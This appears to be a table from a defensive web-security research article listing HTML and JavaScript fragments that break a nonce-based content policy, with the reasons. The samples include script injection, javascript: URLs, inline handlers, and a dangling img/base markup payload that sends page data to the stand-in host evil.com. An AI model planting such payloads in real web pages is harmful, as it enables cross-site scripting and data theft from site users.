Research Article
A Protection Mechanism against Malicious HTML and JavaScript Code in Vulnerable Web Applications
Table 2
The codes violating the policy in Example
2.
| | The code violating the policy | Reason | Policy |
| | <script>malicious script</script> | Missing the nonce attribute | (i) |
| | <script nonce="dDNnf03nceIOfn39">malicious script</script> | An incorrect nonce attribute value | (i) |
| <script nonce="z0h3sdfaEDNnf03n"id="example">
alert(document.getElementById("example").getAttribute("nonce"));
</script> | The nonce attribute cannot be obtained or set by JavaScript code | (ii) |
| <a href = "javascript:malicious script"> example</a>
<a href = "#"onclick="malicious script">example</a> | The javascript:protocol URL and the attribute onclick are disabled | (iii) |
| <img src =http://evil.com/log.cgi?
<base href = http://evil.com/>
<form action = update_profile.php>
<input type = hidden id=share_with value=fred>
<input id = share_with value=bogo>
</form> | An incorrect src attribute value
The base element outside the head element
The two input elements owning the same id attribute value are both invalid | (vi) |
| <script nonce="z0h3sdfaEDNnf03n">
document.write("malicious html or script")
</script> | The call to the JavaScript object document.write is forbidden | (vii) |
| <script nonce="z0h3sdfaEDNnf03n">
setTimeout("malicious script",1000)
</script> | The first parameter of setTimeout is a string | (viii) |
|
|
